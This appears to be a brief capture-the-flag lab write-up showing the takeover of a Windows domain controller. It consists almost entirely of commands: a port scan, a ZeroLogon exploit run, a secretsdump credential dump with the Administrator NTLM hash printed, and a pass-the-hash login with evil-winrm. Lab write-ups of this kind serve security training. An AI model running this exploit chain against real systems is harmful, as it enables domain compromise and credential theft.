Cyber-labs-zero

ipaddress : 172.31.1.29

Table of Contents

port open

rustscan -a 172.31.1.29 --

Open 172.31.1.29:53
Open 172.31.1.29:88
Open 172.31.1.29:135
Open 172.31.1.29:139
Open 172.31.1.29:389
Open 172.31.1.29:445
Open 172.31.1.29:464
Open 172.31.1.29:593
Open 172.31.1.29:636
Open 172.31.1.29:3268
Open 172.31.1.29:3269
Open 172.31.1.29:3389
Open 172.31.1.29:5985
Open 172.31.1.29:9389
ldapsearch -x -s base namingcontexts -h 172.31.1.29

Zero.local
Pasted_image_20220108211856

zero login

python3 zeroLogon-NullPass.py ZERO-DC 172.31.1.29
impacket-secretsdump -just-dc ZERO-DC\$@172.31.1.29

Pasted_image_20220108212254
Pasted_image_20220108212327

Administrator:500:aad3b435b51404eeaad3b435b51404ee:36242e2cb0b26d16fafd267f39ccf990:::

evil-winrm -i 172.31.1.29 -u 'administrator' -H '36242e2cb0b26d16fafd267f39ccf990'

Pasted_image_20220108212429

评论